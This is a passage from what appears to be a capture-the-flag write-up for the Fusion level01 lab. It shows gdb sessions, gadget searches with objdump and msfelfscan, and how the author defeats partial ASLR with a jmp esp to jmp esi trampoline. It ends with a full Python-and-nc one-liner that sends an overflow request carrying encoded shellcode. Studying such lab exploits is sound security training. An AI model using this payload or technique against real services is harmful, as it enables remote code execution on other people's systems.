0xbff0a8e0: 0x43434343 0x43434343 0x43434343 0x43434343

In my case the 0x43s represent where the shellcode would sit. My next step was to examine the registers. The reason being, the challenge only enables ASLR on the stack, heap, and mmap regions; everything else should still be static. If I can find a register that points at my shellcode, I can potentially find a gadget which jumps to that register to get to my shellcode.

(gdb) info registers
eax 0x1 1
ecx 0xb76b78d0 -1217693488
edx 0xbff0a7d0 -1074747440
ebx 0xb782fff4 -1216151564
esp 0xbff0a7d0 0xbff0a7d0
ebp 0x41414141 0x41414141
esi 0xbff0a884 -1074747260
edi 0x8049ed1 134520529
eip 0xbffff3ec 0xbffff3ec
eflags 0x246 [ PF ZF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

Ah ha! There are several promising candidates in our lineup of registers. It looks like edx, esp, or esi could work. Additionally, we control the value of ebp, so we could potentially make use of it as well. There are much fancier ways to do this, but I just used objdump to look for gadgets:

root@fusion:/opt/fusion/bin# objdump -D level01 | grep jmp

8049464: e9 3a ff ff ff jmp 80493a3 <serve_forever+0x14>
80495ff: eb 05 jmp 8049606 <is_restarted_process+0x53>
804962d: eb 44 jmp 8049673 <nread+0x66>
80496a0: eb 44 jmp 80496e6 <nwrite+0x66>
80497c9: eb 09 jmp 80497d4 <secure_srand+0xe1>
804983c: eb 15 jmp 8049853 <fix_path+0x3e>
8049a31: eb 0d jmp 8049a40 <__libc_csu_fini>
8049f0d: e9 ff ff d4 00 jmp 8d99f11 <_end+0xd4ea65>
8049f5f: ff 28 ljmp *(%eax)
8049f7f: ff ac 02 00 00 e2 f8 ljmp *-0x71e0000(%edx,%eax,1)
804a063: ff ab 00 00 00 00 ljmp *0x0(%ebx)
804a0cf: ff 6c 01 00 ljmp *0x0(%ecx,%eax,1)
804a1b7: ff ef ljmp *<internal disassembler error>
804a217: ff 25 01 00 00 00 jmp *0x1
804a25f: ff 61 00 jmp *0x0(%ecx)
804b302: ff 6f 8c ljmp *-0x74(%edi)
804b36a: ff 6f d4 ljmp *-0x2c(%edi)
804b372: ff 6f 01 ljmp *0x1(%edi)
804b37a: ff 6f 70 ljmp *0x70(%edi)
1b8f: ff 21 jmp *(%ecx)
230f: ff a5 8f 00 00 80 jmp *-0x7fffff71(%ebp)
254f: ff ee ljmp *<internal disassembler error>
27e3: ff ab 90 00 00 80 ljmp *-0x7fffff70(%ebx)

Glancing through this, none of those jmps are exactly what I’m looking for so I decided to kick up the fancy levels a bit. What about the shared libraries? Those should be loaded in static locations as well.

(gdb) info sharedlibrary
From To Syms Read Shared Object Library
0xb76cebe0 0xb77db784 Yes /lib/i386-linux-gnu/libc.so.6
0xb7841830 0xb78585cf Yes (*) /lib/ld-linux.so.2
(*): Shared library is missing debugging information.

Check that out: libc is loaded into memory. I would find it very difficult to believe that libc doesn't have what we're looking for. After further examining the registers, ESI is easily the most promising, but there is a small problem.

(gdb) x/80x $esi
0xbff0a884: 0x43430a0d 0x43434343 0x43434343 0x43434343
0xbff0a894: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8a4: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8b4: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8c4: 0x43434343 0x43434343 0x43434343 0x43434343

There are some garbage bytes written at the beginning of that address space, so if we jump directly to ESI we're going to immediately crash. What we need is a jump to ESI at a short offset in. Given the size of libc, I'm guessing that won't be hard to find.

objdump -D /lib/i386-linux-gnu/libc.so.6 | grep jmp | grep esi
1536cf:       ff 6e 06                ljmp   *0x6(%esi)

Indeed it was not. This should do exactly what we want. Now we need to figure out where libc was loaded:

(gdb) info proc mapping
process 15084
cmdline = ‘./level01’
cwd = ‘/’
exe = ‘/opt/fusion/bin/level01’
Mapped address spaces:

Start Addr End Addr Size Offset objfile
0x8048000 0x804b000 0x3000 0 /opt/fusion/bin/level01
0x804b000 0x804c000 0x1000 0x2000 /opt/fusion/bin/level01
0xb76b7000 0xb76b8000 0x1000 0
0xb76b8000 0xb782e000 0x176000 0 /lib/i386-linux-gnu/libc.so.6
0xb782e000 0xb7830000 0x2000 0x176000 /lib/i386-linux-gnu/libc.so.6
0xb7830000 0xb7831000 0x1000 0x178000 /lib/i386-linux-gnu/libc.so.6
0xb7831000 0xb7834000 0x3000 0
0xb783e000 0xb7840000 0x2000 0
0xb7840000 0xb7841000 0x1000 0 [vdso]
0xb7841000 0xb785f000 0x1e000 0 /lib/i386-linux-gnu/ld-linux.so.2
0xb785f000 0xb7860000 0x1000 0x1d000 /lib/i386-linux-gnu/ld-linux.so.2
0xb7860000 0xb7861000 0x1000 0x1e000 /lib/i386-linux-gnu/ld-linux.so.2
0xbfeeb000 0xbff0c000 0x21000 0 [stack]

That’s a little difficult to read, but libc was loaded at 0xb76b8000. Now I confirm our jump is indeed where I think it is:

(gdb) x/i 0xb76b8000+0x1536cf
0xb780b6cf: jmp FWORD PTR [esi+0x6]

At first I thought this would work. Unfortunately, that jumps to the address stored at the pointer esi+0x6, which in our case is 0x43434343 for testing purposes. We just want to jump to ESI itself, and I could find no jumps with an offset matching that criteria; the straight jmp esi gadgets don't come with an offset at all. But we can work with that: after looking at the instructions formed by the garbage bytes (which seemed to be constant), they decode as valid, executable code.

root@fusion:/opt/fusion/bin# objdump -D /lib/i386-linux-gnu/libc.so.6 | grep jmp | grep esi | grep e6 | grep -v "("
77b63: ff e6 jmp *%esi

(gdb) x/i 0xb76b8000+0x77b63
0xb772fb63 <_wordcopy_fwd_aligned+51>: jmp esi

I went ahead and tested this and unfortunately found it still segfaults. After killing the process and reexamining the location of libc, I found it had moved! It appears the locations of all the libraries are still randomized. At this juncture I realized my original tactics wouldn't work: the only module whose location doesn't change is level01 itself. I found a better way of doing things and used msfelfscan to check for jmps in the level01 module:

root@fusion:/opt/fusion/bin# /opt/metasploit-framework/msfelfscan -j esi,esp,eax,edx,edi,ecx level01
0x08048c1f call eax
0x08049a6b call eax
0x08049f4f jmp esp

Not many options unfortunately. On a whim though I checked out ESP:

(gdb) x/8x $esp
0xbfc653fc: 0x08049f4f 0xbfc65400 0x00000020 0x00000004
0xbfc6540c: 0x00000000 0x001761e4 0xbfc654a0 0x20544547

It looks like I may control the last two bytes of what ESP points to. For giggles, I threw in \xFF\xE6 right after my return address; FF E6 is the machine code for jmp esi. To my surprise, it worked! I successfully jumped from ESP to ESI to the buffer I controlled!

fusion@fusion:~$ python -c 'print "GET " + "A"*139 + "\x4f\x9f\x04\x08" + "\xFF\xE6" + " HTTP/1.1\r\n" + "\x59\x53\x4f\x42\x59\x1e\x51\x5d\x0e\x60\x1e\x47\x5d\x90\x46\x92\x57\x56\x91\x47\x60\x4f\x98\x48\x5f\xd6\x5f\x48\x46\x91\x49\x58\x06\x4f\x5b\x5e\x9f\x51\x5e\x5b\x60\x4d\x93\x41\x5f\xfd\x55\xfc\x55\xfc\xdb\xca\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1\x14\xbf\x05\x58\xc6\x87\x31\x7d\x19\x03\x7d\x19\x83\xed\xfc\xe7\xad\xf7\x5c\x10\xae\xab\x21\x8d\x5b\x4e\x2f\xd0\x2c\x28\xe2\x92\x16\xeb\xae\xfa\xaa\x13\x5e\xa6\xc0\x03\x31\x06\x9c\xc5\xdb\xc0\xc6\xc8\x9c\x85\xb6\xd6\x2f\x91\x88\xb1\x82\x19\xab\x8d\x7b\xd4\xac\x7d\xda\x8c\x93\xd9\x10\xd0\xa5\xa0\x52\xb8\x1a\x7c\xd0\x50\x0d\xad\x74\xc9\xa3\x38\x9b\x59\x6f\xb2\xbd\xe9\x84\x09\xbd"' | nc 20001

I tested it outside of GDB and it worked like a champ!